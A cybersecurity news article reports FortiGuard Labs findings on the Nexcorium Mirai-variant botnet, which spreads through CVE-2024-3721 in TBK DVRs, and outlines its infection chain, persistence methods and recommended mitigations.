Hackers Exploit CVE-2024-3721 To Deploy Nexcorium Malware On TBK DVRs

Internet of Things (IoT) devices remain highly vulnerable targets for cyberattacks due to poor security configurations and delayed patching.

Recently, security researchers at Fortinet’s FortiGuard Labs discovered a new threat campaign exploiting a known vulnerability, CVE-2024-3721, in TBK digital video recorders (DVRs).

The attackers are using this flaw to distribute Nexcorium, a dangerous new variant of the notorious Mirai botnet, turning compromised devices into tools for massive distributed denial-of-service (DDoS) attacks.

Infection Chain and Botnet Operations

The attack begins when hackers exploit CVE-2024-3721, an OS command injection vulnerability that specifically affects TBK DVR models such as DVR-4104 and DVR-4216.

By manipulating specific device arguments, attackers execute a malicious downloader script. Interestingly, FortiGuard Labs noted that the exploit traffic includes a custom HTTP header reading “X-Hacked-By: Nexus Team – Exploited By Erratic”.

This unique artifact has led researchers to attribute the campaign to a relatively unknown threat group calling itself the “Nexus Team”.

Once the downloader script runs, it fetches multi-architecture malware binaries to ensure compatibility across various Linux systems, including ARM and x86-64.

Nexcorium shares its core structure with other Mirai variants, functioning through three main modules: a watchdog, a scanner, and an attacker.

To spread further, the malware initiates Telnet brute-force attacks using a hard-coded list of weak default passwords. Furthermore, the botnet relies on an older exploit, CVE-2017-17215, to compromise Huawei devices, rapidly increasing its infection reach.

Persistence Mechanisms and Mitigation

To maintain long-term access on a compromised victim host, Nexcorium employs multiple persistence mechanisms. After successfully invading a system, the malware copies itself to a hidden system directory.

It establishes startup persistence through four distinct methods:

• Init Configuration: It modifies the system’s /etc/inittab file to ensure the malicious process automatically restarts if it is stopped.
• Startup Scripts: The malware updates /etc/rc.local to ensure execution every time the system boots.
• Systemd Services: Nexcorium searches for common systemd paths and generates a custom background service file, enabling it to run automatically.
• Cron Jobs: It schedules continuous tasks using the crontab utility to survive system reboots.

After securing its foothold, Nexcorium deletes its original executable file to hide its tracks and evade security analysis.

According to Fortinet research, to defend against the Nexcorium botnet, cybersecurity experts strongly advise organizations to implement immediate mitigation strategies.

Network administrators should ensure that all IoT devices, particularly TBK DVRs and legacy routers, are updated to the latest firmware. Default passwords must be changed immediately to prevent brute-force intrusions.

Additionally, organizations should deploy robust network filtering to block communication with known malicious C2 domains and leverage modern threat intelligence services to detect suspicious scanning behavior before an infection can take hold.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post Hackers Exploit CVE-2024-3721 To Deploy Nexcorium Malware On TBK DVRs appeared first on Cyber Security News.